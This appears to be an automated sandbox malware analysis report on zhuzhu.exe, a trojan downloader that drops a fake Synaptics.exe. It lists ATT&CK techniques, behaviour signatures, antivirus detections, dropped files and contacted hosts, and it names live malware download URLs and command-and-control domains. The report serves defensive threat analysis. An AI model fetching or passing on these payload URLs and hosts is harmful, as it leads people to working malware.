                                      Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5780, type: MEMORYSTR
                                      Source: Yara matchFile source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
                                      Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXE77E.tmp, type: DROPPED
                                      Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_1000EE80 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcBindingSetAuthInfoExA,RpcStringFreeW,1_2_1000EE80
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_0286EE57 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcBindingSetAuthInfoExA,RpcStringFreeW,1_2_0286EE57
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F51FEA4 listen,7_2_5F51FEA4
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F51FB95 htonl,bind,7_2_5F51FB95
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F5221AC socket,_memset,htonl,htonl,htons,htonl,bind,7_2_5F5221AC

                                      Mitre Att&ck Matrix

                                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                      Gather Victim Identity Information41
                                      Scripting                                      		2
                                      Replication Through Removable Media                                      		21
                                      Windows Management Instrumentation                                      		41
                                      Scripting                                      		1
                                      DLL Side-Loading                                      		1
                                      Disable or Modify Tools                                      		121
                                      Input Capture                                      		2
                                      System Time Discovery                                      		Remote Services1
                                      Archive Collected Data                                      		4
                                      Ingress Tool Transfer                                      		Exfiltration Over Other Network Medium1
                                      System Shutdown/Reboot
                                      CredentialsDomainsDefault Accounts2
                                      Native API                                      		1
                                      DLL Side-Loading                                      		1
                                      Extra Window Memory Injection                                      		1
                                      Deobfuscate/Decode Files or Information                                      		LSASS Memory11
                                      Peripheral Device Discovery                                      		Remote Desktop Protocol1
                                      Screen Capture                                      		11
                                      Encrypted Channel                                      		Exfiltration Over BluetoothNetwork Denial of Service
                                      Email AddressesDNS ServerDomain Accounts2
                                      Command and Scripting Interpreter                                      		1
                                      Registry Run Keys / Startup Folder                                      		1
                                      Access Token Manipulation                                      		2
                                      Obfuscated Files or Information                                      		Security Account Manager1
                                      Account Discovery                                      		SMB/Windows Admin Shares121
                                      Input Capture                                      		1
                                      Non-Standard Port                                      		Automated ExfiltrationData Encrypted for Impact
                                      Employee NamesVirtual Private ServerLocal Accounts1
                                      PowerShell                                      		1
                                      Bootkit                                      		223
                                      Process Injection                                      		1
                                      Software Packing                                      		NTDS5
                                      File and Directory Discovery                                      		Distributed Component Object Model2
                                      Clipboard Data                                      		3
                                      Non-Application Layer Protocol                                      		Traffic DuplicationData Destruction
                                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                                      Registry Run Keys / Startup Folder                                      		1
                                      DLL Side-Loading                                      		LSA Secrets257
                                      System Information Discovery                                      		SSHKeylogging314
                                      Application Layer Protocol                                      		Scheduled TransferData Encrypted for Impact
                                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                      Extra Window Memory Injection                                      		Cached Domain Credentials1
                                      Query Registry                                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                                      Masquerading                                      		DCSync471
                                      Security Software Discovery                                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                      Modify Registry                                      		Proc Filesystem151
                                      Virtualization/Sandbox Evasion                                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
                                      Virtualization/Sandbox Evasion                                      		/etc/passwd and /etc/shadow13
                                      Process Discovery                                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                      Access Token Manipulation                                      		Network Sniffing11
                                      Application Window Discovery                                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd223
                                      Process Injection                                      		Input Capture1
                                      System Owner/User Discovery                                      		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                      Bootkit                                      		Keylogging1
                                      System Network Configuration Discovery                                      		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                      Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                      Indicator Removal                                      		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                                      Behavior Graph

                                      Hide Legend

                                      Legend:

                                      • Process
                                      • Signature
                                      • Created File
                                      • DNS/IP Info
                                      • Is Dropped
                                      • Is Windows Process
                                      • Number of created Registry Values
                                      • Number of created Files
                                      • Visual Basic
                                      • Delphi
                                      • Java
                                      • .Net C# or VB.NET
                                      • C, C++ or other language
                                      • Is malicious
                                      • Internet
                                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582239 Sample: zhuzhu.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 77 freedns.afraid.org 2->77 79 pinst.360.cn 2->79 81 14 other IPs or domains 2->81 107 Suricata IDS alerts for network traffic 2->107 109 Found malware configuration 2->109 111 Antivirus detection for URL or domain 2->111 115 14 other signatures 2->115 11 zhuzhu.exe 1 6 2->11         started        14 inst.exe 2->14         started        18 EXCEL.EXE 192 60 2->18         started        20 2 other processes 2->20 signatures3 113 Uses dynamic DNS services 77->113 process4 dnsIp5 63 C:\Users\user\Desktop\._cache_zhuzhu.exe, PE32 11->63 dropped 65 C:\ProgramData\Synaptics\Synaptics.exe, PE32 11->65 dropped 67 C:\ProgramData\Synaptics\RCXE77E.tmp, PE32 11->67 dropped 69 C:\...\Synaptics.exe:Zone.Identifier, ASCII 11->69 dropped 22 ._cache_zhuzhu.exe 18 11->22         started        27 Synaptics.exe 100 11->27         started        93 39.156.85.200, 49806, 80 CMNET-GDGuangdongMobileCommunicationCoLtdCN China 14->93 95 39.156.85.201, 49807, 80 CMNET-GDGuangdongMobileCommunicationCoLtdCN China 14->95 97 7 other IPs or domains 14->97 71 C:\Users\user\AppData\Local\...\sites.dll, PE32 14->71 dropped 73 C:\Users\user\AppData\Local\...\360P2SP.dll, PE32 14->73 dropped 131 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 14->131 133 Contains functionality to infect the boot sector 14->133 135 Checks if browser processes are running 14->135 137 3 other signatures 14->137 29 splwow64.exe 18->29         started        file6 signatures7 process8 dnsIp9 83 118.107.44.219, 18852, 19091, 19092 BCPL-SGBGPNETGlobalASNSG Singapore 22->83 85 bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com 47.79.48.211, 443, 49732 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States 22->85 55 C:\Users\user\Downloads\inst.exe, PE32 22->55 dropped 57 C:\Users\user\AppData\...\._cache_zhuzhu.exe, PE32 22->57 dropped 59 C:\Users\user\AppData\Local\...\inst[1].exe, PE32 22->59 dropped 119 Detected unpacking (overwrites its own PE header) 22->119 31 ._cache_zhuzhu.exe 22->31         started        87 docs.google.com 142.250.181.238, 443, 49738, 49739 GOOGLEUS United States 27->87 89 drive.usercontent.google.com 142.250.186.129, 443, 49745, 49747 GOOGLEUS United States 27->89 91 freedns.afraid.org 69.42.215.252, 49743, 80 AWKNET-LLCUS United States 27->91 61 C:\Users\user\Documents\DTBZGIOOSO\~$cache1, PE32 27->61 dropped 121 Antivirus detection for dropped file 27->121 123 Multi AV Scanner detection for dropped file 27->123 125 Drops PE files to the document folder of the user 27->125 127 Machine Learning detection for dropped file 27->127 35 WerFault.exe 27->35         started        37 WerFault.exe 27->37         started        file10 signatures11 process12 file13 75 C:\Users\user\AppData\Local\updated.ps1, ASCII 31->75 dropped 99 Protects its processes via BreakOnTermination flag 31->99 101 Contains functionality to inject threads in other processes 31->101 103 Contains functionality to capture and log keystrokes 31->103 105 Contains functionality to inject code into remote processes 31->105 39 cmd.exe 31->39         started        42 cmd.exe 31->42         started        signatures14 process15 signatures16 117 Bypasses PowerShell execution policy 39->117 44 powershell.exe 39->44         started        47 conhost.exe 39->47         started        49 conhost.exe 42->49         started        51 powershell.exe 42->51         started        process17 signatures18 129 Loading BitLocker PowerShell Module 44->129 53 conhost.exe 47->53         started        process19

                                      Screenshots

                                      Thumbnails

                                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                      windows-stand

                                      Antivirus, Machine Learning and Genetic Malware Detection

                                      Initial Sample

                                      SourceDetectionScannerLabelLink
                                      zhuzhu.exe83%VirustotalBrowse
                                      zhuzhu.exe92%ReversingLabsWin32.Trojan.Synaptics
                                      zhuzhu.exe100%AviraTR/Dldr.Agent.SH
                                      zhuzhu.exe100%AviraW2000M/Dldr.Agent.17651006
                                      zhuzhu.exe100%Joe Sandbox ML

                                      Dropped Files

                                      SourceDetectionScannerLabelLink
                                      C:\Users\user\Documents\DTBZGIOOSO\~$cache1100%AviraTR/Dldr.Agent.SH
                                      C:\Users\user\Documents\DTBZGIOOSO\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                                      C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                                      C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                                      C:\ProgramData\Synaptics\RCXE77E.tmp100%AviraTR/Dldr.Agent.SH
                                      C:\ProgramData\Synaptics\RCXE77E.tmp100%AviraW2000M/Dldr.Agent.17651006
                                      C:\Users\user\Documents\DTBZGIOOSO\~$cache1100%Joe Sandbox ML
                                      C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                                      C:\ProgramData\Synaptics\RCXE77E.tmp100%Joe Sandbox ML
                                      C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\inst[1].exe17%ReversingLabs
                                      C:\Users\user\AppData\Local\Temp\{92EE34F9-CBF9-4899-A446-C0FD9C9E29A7}.tmp\360P2SP.dll4%ReversingLabs
                                      C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll0%ReversingLabs
                                      C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe0%ReversingLabs
                                      C:\Users\user\Desktop\._cache_zhuzhu.exe0%ReversingLabs
                                      C:\Users\user\Downloads\inst.exe17%ReversingLabs

                                      Unpacked PE Files

                                      No Antivirus matches

                                      Domains

                                      No Antivirus matches

                                      URLs

                                      SourceDetectionScannerLabelLink
                                      https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exep0%Avira URL Cloudsafe
                                      https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeg0%Avira URL Cloudsafe
                                      http://xred.site50.net/syn/SSLLibrary.dlD100%Avira URL Cloudmalware
                                      http://pinst.360.cn/360safe/h_inst.cab?rd=341832200%Avira URL Cloudsafe
                                      https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/0%Avira URL Cloudsafe
                                      http://xred.site50.net/syn/Synaptics.rarh100%Avira URL Cloudmalware
                                      http://xred.site50.net/syn/SUpdate.ini100%Avira URL Cloudmalware
                                      https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exet0%Avira URL Cloudsafe
                                      https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exel0%Avira URL Cloudsafe
                                      https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/t0%Avira URL Cloudsafe
                                      https://drive.a0%Avira URL Cloudsafe
                                      http://xred.site50.net/syn/Synaptics.rar100%Avira URL Cloudmalware
                                      https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exe)0%Avira URL Cloudsafe
                                      https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exe0%Avira URL Cloudsafe
                                      http://xred.site50.net/syn/SSLLibrary.dll100%Avira URL Cloudmalware
                                      https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeD0%Avira URL Cloudsafe

                                      Domains and IPs

                                      Contacted Domains

                                      NameIPActiveMaliciousAntivirus DetectionReputation
                                      freedns.afraid.org
                                      		69.42.215.252
                                      		truefalse
                                        		high
                                        tr.p.360.cn
                                        		1.192.136.132
                                        		truefalse
                                          		high
                                          docs.google.com
                                          		142.250.181.238
                                          		truefalse
                                            		high
                                            agt.p.360.cn
                                            		1.192.136.132
                                            		truefalse
                                              		high
                                              agd2.p.360.cn
                                              		1.192.194.215
                                              		truefalse
                                                		high
                                                bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                                                		47.79.48.211
                                                		truefalse
                                                  		unknown
                                                  s-part-0017.t-0009.t-msedge.net
                                                  		13.107.246.45
                                                  		truefalse
                                                    		high
                                                    drive.usercontent.google.com
                                                    		142.250.186.129
                                                    		truefalse
                                                      		high
                                                      s.360.cn
                                                      		180.163.251.230
                                                      		truefalse
                                                        		high
                                                        seupdate.360qhcdn.com
                                                        		39.156.85.231
                                                        		truefalse
                                                          		high
                                                          st.p.360.cn
                                                          		1.192.136.170
                                                          		truefalse
                                                            		high
                                                            agd.p.360.cn
                                                            		unknown
                                                            		unknownfalse
                                                              		high
                                                              xred.mooo.com
                                                              		unknown
                                                              		unknownfalse
                                                                		high
                                                                pinst.360.cn
                                                                		unknown
                                                                		unknowntrue
                                                                  		unknown

                                                                  Contacted URLs

                                                                  NameMaliciousAntivirus DetectionReputation
                                                                  http://s.360.cn/safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=false
                                                                    		high
                                                                    http://s.360.cn/safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=false
                                                                      		high
                                                                      http://s.360.cn/safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0false
                                                                        		high
                                                                        http://s.360.cn/safe/instcomp.htm?soft=1000&status=12&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=false
                                                                          		high
                                                                          http://pinst.360.cn/360safe/h_inst.cab?rd=34183220false
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://s.360.cn/safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=2282&downrate=0&downlen=0false
                                                                            		high
                                                                            http://s.360.cn/safe/instcomp.htm?soft=1000&status=127&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid=false
                                                                              		high
                                                                              xred.mooo.comfalse
                                                                                		high
                                                                                http://s.360.cn/safe/instcomp.htm?soft=1000&status=107&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=false
                                                                                  		high
                                                                                  http://s.360.cn/safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=false
                                                                                    		high
                                                                                    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                                                                      		high
                                                                                      http://s.360.cn/safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=false
                                                                                        		high
                                                                                        https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exefalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://s.360.cn/safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=false
                                                                                          		high
                                                                                          http://s.360.cn/safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=false
                                                                                            		high

                                                                                            URLs from Memory and Binaries

                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                            http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.drfalse
                                                                                                		high
                                                                                                https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/t._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000AE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://drive.usercontent.google.com/dKSynaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeg._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://xred.site50.net/syn/Synaptics.rarhzhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://docs.google.com/Synaptics.exe, 00000002.00000002.2434252916.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000069C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlXzhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://xred.site50.net/syn/SSLLibrary.dlDzhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exet._cache_zhuzhu.exe, 00000001.00000002.1781152699.0000000006300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exep._cache_zhuzhu.exe, 00000001.00000002.1772550299.000000000019A000.00000004.00000010.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1772613360.0000000000400000.00000040.00000001.01000000.00000005.sdmp, ._cache_zhuzhu.exe, 00000004.00000002.4138120900.000000000019D000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000AE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://xred.site50.net/syn/SUpdate.iniSynaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.drtrue
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exel._cache_zhuzhu.exe, 00000001.00000002.1781152699.0000000006300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978xzhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://drive.aSynaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://drive.usercontent.google.com/N=Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://drive.usercontent.google.com/Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1770138974.000000000543D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://xred.site50.net/syn/Synaptics.rarSynaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.drtrue
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    		unknown
                                                                                                                    http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.drfalse
                                                                                                                          		high
                                                                                                                          https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~DF163C59614BB26FC3.TMP.3.dr, ~$cache1.2.dr, Synaptics.exe.0.drfalse
                                                                                                                            		high
                                                                                                                            https://docs.google.com/TSynaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exe)._cache_zhuzhu.exe, 00000001.00000002.1781152699.0000000006300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://docs.google.com/cellemSynaptics.exe, 00000002.00000002.2535106563.000000001CFAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://docs.google.com/LSynaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeD._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://docs.google.com/HSynaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://docs.google.com/uc?id=0;Synaptics.exe, 00000002.00000002.2549473645.000000002303E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2487297293.000000001034E000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.incredibuild.comzhuzhu.exe, 00000000.00000000.1657356123.00000000004A5000.00000002.00000001.01000000.00000003.sdmp, zhuzhu.exe, 00000000.00000003.1666861585.00000000067FE000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000000.1663851009.0000000000401000.00000020.00000001.01000000.00000005.sdmp, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drfalse
                                                                                                                                        		high
                                                                                                                                        http://xred.site50.net/syn/SSLLibrary.dllSynaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.drtrue
                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                        		unknown

                                                                                                                                        World Map of Contacted IPs

                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs

                                                                                                                                        Public IPs

                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        39.156.85.201
                                                                                                                                        		unknownChina
                                                                                                                                        		9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                                                                                                                                        39.156.85.200
                                                                                                                                        		unknownChina
                                                                                                                                        		9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                                                                                                                                        1.192.136.135
                                                                                                                                        		unknownChina
                                                                                                                                        		137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                        39.156.85.231
                                                                                                                                        		seupdate.360qhcdn.comChina
                                                                                                                                        		9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                                                                                                                                        180.163.251.230
                                                                                                                                        		s.360.cnChina
                                                                                                                                        		4812CHINANET-SH-APChinaTelecomGroupCNfalse
                                                                                                                                        1.192.136.134
                                                                                                                                        		unknownChina
                                                                                                                                        		137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                        1.192.136.133
                                                                                                                                        		unknownChina
                                                                                                                                        		137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                        1.192.136.132
                                                                                                                                        		tr.p.360.cnChina
                                                                                                                                        		137687CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePRfalse
                                                                                                                                        47.79.48.211
                                                                                                                                        		bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.comUnited States
                                                                                                                                        		9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
                                                                                                                                        69.42.215.252
                                                                                                                                        		freedns.afraid.orgUnited States
                                                                                                                                        		17048AWKNET-LLCUSfalse
                                                                                                                                        142.250.181.238
                                                                                                                                        		docs.google.comUnited States
                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                        142.250.186.129
